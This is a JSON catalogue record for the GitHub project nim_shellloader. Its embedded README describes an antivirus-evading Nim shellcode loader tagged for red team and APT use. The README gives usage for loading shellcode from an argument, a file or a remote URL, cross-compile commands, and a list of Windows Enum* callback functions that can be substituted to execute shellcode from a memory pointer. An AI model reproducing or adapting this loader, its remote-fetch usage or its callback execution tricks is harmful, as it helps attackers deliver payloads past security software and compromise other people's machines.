{"id":13843805,"url":"https://github.com/sh3d0ww01f/nim_shellloader","last_synced_at":"2025-04-09T16:23:48.984Z","repository":{"id":39332841,"uuid":"428294285","full_name":"sh3d0ww01f/nim_shellloader","owner":"sh3d0ww01f","description":"nim,免杀,红队,shellcode,bypass,apt,bypass-av.","archived":false,"fork":false,"pushed_at":"2023-02-14T14:32:58.000Z","size":4083,"stargazers_count":202,"open_issues_count":1,"forks_count":33,"subscribers_count":4,"default_branch":"master","last_synced_at":"2025-03-23T18:47:17.182Z","etag":null,"topics":["bypass-antivirus","nim","nim-lang","shellcode-loader"],"latest_commit_sha":null,"homepage":"","language":"Nim","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/sh3d0ww01f.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2021-11-15T14:21:43.000Z","updated_at":"2025-03-09T05:56:20.000Z","dependencies_parsed_at":"2024-02-08T21:11:44.178Z","dependency_job_id":null,"html_url":"https://github.com/sh3d0ww01f/nim_shellloader","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sh3d0ww01f%2Fnim_shellloader","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sh3d0ww01f%2Fnim_shellloader/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sh3d0ww01f%2Fnim_shellloader/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sh3d0ww01f%2Fnim_shellloader/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/sh3d0ww01f","download_url":"http
s://codeload.github.com/sh3d0ww01f/nim_shellloader/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248065975,"owners_count":21042012,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass-antivirus","nim","nim-lang","shellcode-loader"],"created_at":"2024-08-04T17:02:27.688Z","updated_at":"2025-04-09T16:23:48.966Z","avatar_url":"https://github.com/sh3d0ww01f.png","language":"Nim","funding_links":[],"categories":["Nim"],"sub_categories":[],"readme":"# nim_shellloader \n\nDetails below:\n# usage\n```\nloader.exe payload.bin\nloader.exe  (yourshellcode)\nloader.exe (http://xxxx/xxx)\n```\nPass the shellcode content, the bin file name, or the URL directly as the argument.\n\n\n① use shellcode:\n\n![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/1.gif)\n\n② use a bin file to load the shellcode\n\n![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/2.gif)\n\n③ load the shellcode hosted on your server (remote load)\n\n![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/3.gif)\n\nBesides, you can load shellcode hosted in your repository (Gitee, GitHub, etc.) 
like this\n\n![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/4.png)\n\nNotice: You must remove '\\x' from your shellcode\n\n![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/5.png)\n\n\nDetection results\n\n\n![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/6.png)\n\n# Compile\n\nstep1: install the required libraries\n```\nnimble install https://github.com/khchen/winim\nnimble install https://github.com/status-im/nim-stew\n```\nstep2: generate the exe\n```\nnim c --cpu:i386 -d:mingw -d:ssl --opt:size shellcode_loader.nim\n```\n# Advice\nIt's easy to run into problems if you compile it on the Windows platform. In my opinion, you'd better compile it on Linux; you can cross-compile on Debian 11, but remember to install mingw.\n\n\nIf it goes wrong with: ```could not load:(libcrypto-1_1|libeay32).dll```\n\nI consider this is because of the wrong command (it didn't match the target's platform): i386 at compile time means x86, so please change \"i386\" to \"amd64\", like the following\n\n```\nnim c --cpu:amd64 -d:mingw -d:ssl --opt:size shellcode_loader.nim\n```\n\nIf it is compiled on Windows, you don't need to add ```-d:mingw```\n\n## It's possible that the shellcode_loader will go wrong with:\n could not load: (libcrypto-1_1-x64|libeay64).dll\n \nThat means you may need to resolve these DLLs\n```\nlibcrypto-1_1-x64.dll\n\nlibenchant.dll\n\nlibpq.dll\n\nlibsasl.dll\n\nlibsodium.dll\n\nlibssh2.dll\n\nlibssl-1_1-x64.dll\n```\nYou can find them in the PHP installation folder on Windows\n\nAlso, you can download them from the Internet\n\n\n## The callback function named \"EnumSystemGeoID\" in my source can be replaced with the following equivalent functions\n``` \n# Callback execution\n    
EnumSystemGeoID(GEOCLASS_NATION,0,cast[GEO_ENUMPROC](rPtr)) #①\n    EnumChildWindows(cast[HWND](nil),cast[WNDENUMPROC](rPtr),cast[LPARAM](nil))#②\n    EnumDateFormatsA(cast[DATEFMT_ENUMPROCA](rPtr) , LOCALE_SYSTEM_DEFAULT, cast[DWORD](0))#③\n    EnumDesktopsW(GetProcessWindowStation(),cast[DESKTOPENUMPROCW](rPtr), cast[LPARAM](nil))#④\n    EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()),cast[WNDENUMPROC](rPtr), cast[LPARAM](nil))#⑤\n    EnumSystemCodePagesA(cast[CODEPAGE_ENUMPROCA](rPtr) ,0)#⑥\n    EnumSystemCodePagesW(cast[CODEPAGE_ENUMPROCW](rPtr), CP_INSTALLED)#⑦\n    EnumSystemLanguageGroupsA(cast[LANGUAGEGROUP_ENUMPROCA](rPtr),LGRPID_SUPPORTED,0)#⑧\n    EnumSystemLocalesA(cast[LOCALE_ENUMPROCA](rPtr) ,nil)#⑨\n    EnumThreadWindows(0,cast[WNDENUMPROC](rPtr),0) #⑩\n    EnumUILanguagesA(cast[UILANGUAGE_ENUMPROCA](rPtr), MUI_LANGUAGE_ID, 0)#11\n    EnumWindows(cast[WNDENUMPROC](rPtr), cast[LPARAM](nil))#12\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsh3d0ww01f%2Fnim_shellloader","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsh3d0ww01f%2Fnim_shellloader","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsh3d0ww01f%2Fnim_shellloader/lists"}